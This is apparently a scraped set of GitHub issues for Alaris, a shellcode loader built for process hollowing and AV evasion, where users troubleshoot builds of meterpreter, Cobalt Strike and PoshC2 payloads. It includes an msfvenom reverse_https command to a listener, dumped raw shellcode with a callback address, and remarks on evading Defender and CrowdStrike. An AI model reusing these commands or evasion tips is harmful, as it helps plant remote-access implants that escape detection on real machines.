joshfaust / alaris Goto Github PK

Hey

I love the tool's idea so I tried it out on some msf shellcode. It errors out on reading the file. Here is a log.

┌──(user㉿DESKTOP-O0R9DEO)-[/opt/Alaris]
└─$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.xx.xx LPORT=4422 -f raw -o ~/Desktop/met64.raw
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 601 bytes
Saved as: /home/user/Desktop/met64.raw

┌──(user㉿DESKTOP-O0R9DEO)-[/opt/Alaris]
└─$ python3 builder.py -s ~/Desktop/met64.raw -p testing -o ~/Desktop/alaris.exe
[i] Key, IV Generation: Successful
[+] Key: 2a8d8dde386617fa549e7e5cba45b3725236b8203ede5ffca0bbf4584180f551
[+] IV: e9279e986c717652078521d2c21a6a17
[+] Salt: 0377a67814b64877851d6be6bf52b6cd
Traceback (most recent call last):
File "/opt/Alaris/builder.py", line 203, in
raw_shellcode = parse_shellcode(args.sc_file)
File "/opt/Alaris/builder.py", line 155, in parse_shellcode
if "octet-stream" not in file_type:
TypeError: argument of type 'NoneType' is not iterable

┌──(switchblade㉿DESKTOP-O0R9DEO)-[/opt/Alaris]
└─$ python3 builder.py -s /home/user/Desktop/met64.raw -p testing -o ~/Desktop/alaris.exe
[i] Key, IV Generation: Successful
[+] Key: 5d19eafe276a62de5548de7a3d0fed6d289ef86b8dfda8f54ab32eb5d650a3a3
[+] IV: 4fef5b6eb94226d182eff2a21c6197f4
[+] Salt: aab0a888d04f10403f332a89e102e21e
Traceback (most recent call last):
File "/opt/Alaris/builder.py", line 203, in
raw_shellcode = parse_shellcode(args.sc_file)
File "/opt/Alaris/builder.py", line 155, in parse_shellcode
if "octet-stream" not in file_type:
TypeError: argument of type 'NoneType' is not iterable

Additionally, on some shellcode it doesn't read it as binary at all.

┌──(user㉿DESKTOP-O0R9DEO)-[/opt/Alaris]
└─$ python3 builder.py -s /var/www/html/shell.txt -p testing
[i] Key, IV Generation: Successful
[+] Key: 4d544a6e86e2f7e2af1f7c16cf7e2ee72156e381a3a2fef88779d4188709c07c
[+] IV: 0f6c9f43f0a3669860336e4afbb2821e
[+] Salt: a696dad713faa958bd4b0d29a4e82190
[!] ERROR: /var/www/html/shell.txt does not look to be a RAW Binary file

┌──(user㉿DESKTOP-O0R9DEO)-[/opt/Alaris]
└─$ cat /var/www/html/shell.txt
A���RH�R �B<AQH�f�x�R`H�RH�R H�JJH�rPM1�H1��<a|, A��
�A�8�u�LLE9�u�XD�@$I�fA�H��tgH�PD�@ IЋH�VM1�H��A�4�H�H1�A��
HD�@i�A��H�AXAX^YZAXAYAZH�� AR��XAYZH��K���]H1�SI�wininetAVH��I��Lw&��SSH��SZM1�M1�SSI�:Vy����192.168.xx.xxZH��I��FM1�SSjSI�W������/YPNo70l3ICod-hz4fc-4NgCoWd3jSjeH3C-quIldCaWdfJxBPEAmW7ajqNVFcc0Azky63TqgWwCETQhCi0RWk9BIbaaeA8h3YzEfNfEqTiNJpQ9qhHvHJ5xVipJSabQrEYg6OmtyFI5qoq6HMJgaxtDk6GjmMMYxv8yZ1rzYKYja0Qmr42H��SZAXM1�SH�2��PSSI���U.;��H��j
_H��jZRh�3I��jAYI�uF����M1�SZH��M1�M1�SSI��-{�Յ�uH���I�D�5���H��t��USYj@ZI����I��I�X�S���H�SSH��H��H��I�� I��I������H�� ��t�f�HÅ�u�X�XjYI���V��

How to deal with this situation? Thank you for your help

Heads up here, Crowdstrike gave a medium risk flag with "Defense Evasion via Process Hollowing". However, it seems simply by using different hollow_bin it still can be bypassed. Did they really set the detection rule against mobsync.exe :D
By the way, amazing tool, almost nothing worked out-of-the-box with defender bypass using meterpreter payload, Alaris did.

Getting the below error on Win10 x64 with latest Python 3.9.2:

python builder.py -s c:\temp\shellcode.bin -p {redacted} -o c:\temp\shellcode.exe
�[36m[i] Key, IV Generation:�[32m Successful�[39m
�[36m [+] Key:�[35m 76a4bdc4d17ef05116bd8c122841aef093e75eb701ff68628ceece84ce37e547�[39m
�[36m [+] IV:�[35m 871b56e90419ec41c0e01fd6bd93a589�[39m
�[36m [+] Salt:�[35m b35a686992959641a2668b9d731c567d�[39m
�[36m[i] Encrypt Shellcode:�[32m Successful�[39m
�[36m[i] Variable Swap:�[32m Successful�[39m
Compile Error: b''

Hi first of all great work. The idea of using direct calls and encrypted shellcode along with process hollowing and PPID spoofing is really cool. However I am facing a few issues. I compiled a fresh copy of the solution on a VM and generated the two exes. However cant get the loader to connect to the listener on localhost. The mobsync.exe process stays suspended.
I am also getting a couple of warnings. I've attached a couple of screenshots. Can you identify what I'm doing wrong?

No connects :(

The warnings

OS and machine info

I know you fixed the larger sc issue already, but is there a way to make it work with stageless CS payloads? i get the too big sc error when i try it that way.

C:\Users\Alex\Desktop\cs\CS4.4\scripts\Alaris-master>python builder.py -s C:\Users\Alex\Desktop\payload.bin -p 123
�[36m[i] Key, IV Generation:�[32m Successful�[39m
�[36m [+] Key:�[35m b5baa2742df5cb7a580f86de7faaa0de8d87308ef7b44cc2e82e7f7f12e88d50�[39m
�[36m [+] IV:�[35m 89e5a34c6ca962e0d05557987f125220�[39m
�[36m [+] Salt:�[35m 7cda6b1a1823e0d7094d03c0620cad78�[39m
[Errno 22] Invalid argument: 'C:\Users\Alex\Desktop\payload.bin'
[!] ERROR: Shellcode not in binary (bin,raw) format

First thanks for such great loader, i have an issue when i try to build the loader, i get this error...any idea ?

Severity Code Description Project File Line Suppression State
Error LNK1181 cannot open input file 'x64\Release\loader.res' loader C:\Users***\Desktop\loader\loader\LINK 1

after compiling with builder.py and executing on a different machine, complains about the missing dll..

Any tips for using larger shellcode? Hitting line length limit. Thought about loading the shellcode over http or unc.

Hi @cribdragg3r thank you for your great tool (encryption, process hollowing + PPID, syswhisper2...) good ideas and such a great work.
However I am facing this issue after using PoshC2 (v7.4.0) after generating the exe using the build_patch branch after reading (#7 ); it crash after 2 seconds after executing the generated exe (same with svchost).
I tried all generated binary less 43 kb shellcode ex; "PBind_v4_Donut_x86_Shellcode, Posh_v2_Donut_x64_Shellcode, Sharp_v4_Donut_x64_Shellcode, PBindSharp_v4_Donut_x64_Shellcode".Can you identify what I'm doing wrong?

Event Name: BEX64
Response: Not available
Cab Id: 0

Problem signature:
P1: mobsync.exe
P2: 10.0.19041.1
P3: b01b5661
P4: StackHash_a011
P5: 0.0.0.0
P6: 00000000
P7: PCH_C1_FROM_unknown+0x0000000000000000
P8: c0000005
P9: 0000000000000008

Compiled successfully，but shellcode is not executed

Since the max shellcode size update (thank you for this, really looking forward to the tool), Alaris will build the payload (following your exact cobaltstrike steps to generate the SC, but the executable doesnt result in a beacon. All other payloads from CS work fine, so my setup is ok. ideas? watching the process is task manager shows it run for about 10 seconds and close, no endpoint security.

Keep getting "ModuleNotFoundError: No module named 'Crypto'" even tho I have cryptodome installed. What am I doing wrong here?

is it possible to add other process protections other than "SetProcessMitigationPolicy function" into the args input and different worker process?
maybe in https://github.com/cribdragg3r/Alaris/blob/master/loader/loader/loader.cpp